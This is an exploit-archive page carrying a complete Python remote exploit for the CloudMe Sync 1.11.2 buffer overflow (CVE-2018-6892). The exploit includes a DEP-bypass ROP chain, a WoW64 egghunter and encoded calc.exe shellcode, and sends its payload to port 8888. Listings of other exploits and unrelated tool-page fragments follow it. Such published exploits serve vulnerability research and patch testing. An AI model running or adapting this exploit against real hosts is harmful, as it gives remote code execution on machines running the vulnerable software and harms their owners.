Menu

Search for hundreds of thousands of exploits

"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)"

Author

Exploit author

"Matteo Malvica"

Platform

Exploit platform

windows_x86-64

Release date

Exploit published date

2019-01-28

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
# Date: 24.01.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category: Remote
# Contact:https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# CVE-2018-6892
# Ported to WoW64 from https://www.exploit-db.com/exploits/46218 

import socket
import struct

def create_rop_chain():
	# rop chain generated with mona.py - www.corelan.be
        rop_gadgets = [
		0x61ba8b5e,  # POP EAX # RETN [Qt5Gui.dll] 
		0x690398a8,  # ptr to &VirtualProtect() [IAT Qt5Core.dll]
		0x61bdd7f5,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll] 
		0x68aef542,  # XCHG EAX,ESI # RETN [Qt5Core.dll] 
		0x68bfe66b,  # POP EBP # RETN [Qt5Core.dll] 
		0x68f82223,  # & jmp esp [Qt5Core.dll]
		0x6d9f7736,  # POP EDX # RETN [Qt5Sql.dll] 
		0xfffffdff,  # Value to negate, will become 0x00000201
		0x6eb47092,  # NEG EDX # RETN [libgcc_s_dw2-1.dll] 
		0x61e870e0,  # POP EBX # RETN [Qt5Gui.dll] 
		0xffffffff,  #  
		0x6204f463,  # INC EBX # RETN [Qt5Gui.dll] 
		0x68f8063c,  # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll] 
		0x61ec44ae,  # POP EDX # RETN [Qt5Gui.dll] 
		0xffffffc0,  # Value to negate, will become 0x00000040
		0x6eb47092,  # NEG EDX # RETN [libgcc_s_dw2-1.dll] 
		0x61e2a807,  # POP ECX # RETN [Qt5Gui.dll] 
		0x6eb573c9,  # &Writable location [libgcc_s_dw2-1.dll]
		0x61e85d66,  # POP EDI # RETN [Qt5Gui.dll] 
		0x6d9e431c,  # RETN (ROP NOP) [Qt5Sql.dll]
		0x61ba8ce5,  # POP EAX # RETN [Qt5Gui.dll] 
		0x90909090,  # nop
		0x61b6b8d0,  # PUSHAD # RETN [Qt5Gui.dll] 
  	]
        return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

target="127.0.0.1"
junk="A"*1052
eip = "\xfc\x57\xea\x61" #  0x61ea57fc  	
nops = "\x90\x90\x90\x90" 

egg64 = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xea\xb8"
"\x77\x30\x30\x74"  # tag w00t
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")

#Shellcode calc.exe
shellcode = ""
shellcode += "\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x31\xba\xef"
shellcode += "\xc3\xbd\x59\x83\xc0\x04\x31\x50\x14\x03\x50\xfb\x21"
shellcode += "\x48\xa5\xeb\x24\xb3\x56\xeb\x48\x3d\xb3\xda\x48\x59"
shellcode += "\xb7\x4c\x79\x29\x95\x60\xf2\x7f\x0e\xf3\x76\xa8\x21"
shellcode += "\xb4\x3d\x8e\x0c\x45\x6d\xf2\x0f\xc5\x6c\x27\xf0\xf4"
shellcode += "\xbe\x3a\xf1\x31\xa2\xb7\xa3\xea\xa8\x6a\x54\x9f\xe5"
shellcode += "\xb6\xdf\xd3\xe8\xbe\x3c\xa3\x0b\xee\x92\xb8\x55\x30"
shellcode += "\x14\x6d\xee\x79\x0e\x72\xcb\x30\xa5\x40\xa7\xc2\x6f"
shellcode += "\x99\x48\x68\x4e\x16\xbb\x70\x96\x90\x24\x07\xee\xe3"
shellcode += "\xd9\x10\x35\x9e\x05\x94\xae\x38\xcd\x0e\x0b\xb9\x02"
shellcode += "\xc8\xd8\xb5\xef\x9e\x87\xd9\xee\x73\xbc\xe5\x7b\x72"
shellcode += "\x13\x6c\x3f\x51\xb7\x35\x9b\xf8\xee\x93\x4a\x04\xf0"
shellcode += "\x7c\x32\xa0\x7a\x90\x27\xd9\x20\xfe\xb6\x6f\x5f\x4c"
shellcode += "\xb8\x6f\x60\xe0\xd1\x5e\xeb\x6f\xa5\x5e\x3e\xd4\x59"
shellcode += "\x15\x63\x7c\xf2\xf0\xf1\x3d\x9f\x02\x2c\x01\xa6\x80"
shellcode += "\xc5\xf9\x5d\x98\xaf\xfc\x1a\x1e\x43\x8c\x33\xcb\x63"
shellcode += "\x23\x33\xde\x07\xa2\xa7\x82\xe9\x41\x40\x20\xf6"

payload = junk+ eip + nops * 3 + rop_chain + nops*4  + egg64 + nops*4  + "w00tw00t" + shellcode

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8888))
	s.send(payload)
except:
	print "Crashed!"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-01-07 "Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP)" local windows_x86-64 bluefrostsec
2019-12-07 "Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack" local windows_x86-64 "Axel Souchet"
2019-11-03 "DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable'" local windows_x86-64 Mumbai
2019-10-07 "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)" local windows_x86-64 max7253
2019-08-16 "GetGo Download Manager 6.2.2.3300 - Denial of Service" dos windows_x86-64 "Malav Vyas"
2019-01-28 "CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)" remote windows_x86-64 "Matteo Malvica"
2019-01-02 "EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)" dos windows_x86-64 Achilles
2019-01-02 "NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2019-01-02 "NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2018-11-16 "Mumsoft Easy Software 2.0 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
Release Date Title Type Platform Author
2020-09-28 "MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation" local windows "Matteo Malvica"
2020-05-22 "Druva inSync Windows Client 6.6.3 - Local Privilege Escalation" local windows "Matteo Malvica"
2019-03-04 "Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)" webapps windows "Matteo Malvica"
2019-02-21 "RealTerm Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow (SEH)" local windows "Matteo Malvica"
2019-02-06 "River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)" local windows "Matteo Malvica"
2019-01-28 "CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)" remote windows_x86-64 "Matteo Malvica"
2018-12-21 "AnyBurn 4.3 - Local Buffer Overflow (SEH)" local windows "Matteo Malvica"
2018-10-09 "Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)" local windows_x86-64 "Matteo Malvica"
2018-08-27 "CuteFTP 5.0 - Buffer Overflow" local windows_x86 "Matteo Malvica" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected